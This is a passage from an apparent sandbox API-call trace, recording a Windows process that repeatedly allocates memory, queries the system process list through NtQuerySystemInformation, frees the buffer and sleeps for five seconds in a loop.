ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.505] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.505] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.522] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.534] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.535] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.536] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.549] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.552] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.552] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.564] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.565] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.565] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.568] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.580] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.581] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.584] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.596] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.596] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.599] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.612] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.612] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.615] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.628] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.628] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.631] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.642] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.643] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.643] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.645] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.646] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.657] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.658] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.660] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.661] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.673] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.673] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.674] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.674] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.676] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.676] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.689] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.690] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.693] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.704] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.705] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.709] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.720] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.723] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.724] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.738] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.741] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.741] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.752] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.754] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.754] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.767] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.768] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.768] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.770] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.771] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.782] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.792] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.794] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.795] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.799] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.799] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.800] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.802] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.813] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.814] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.817] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.830] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 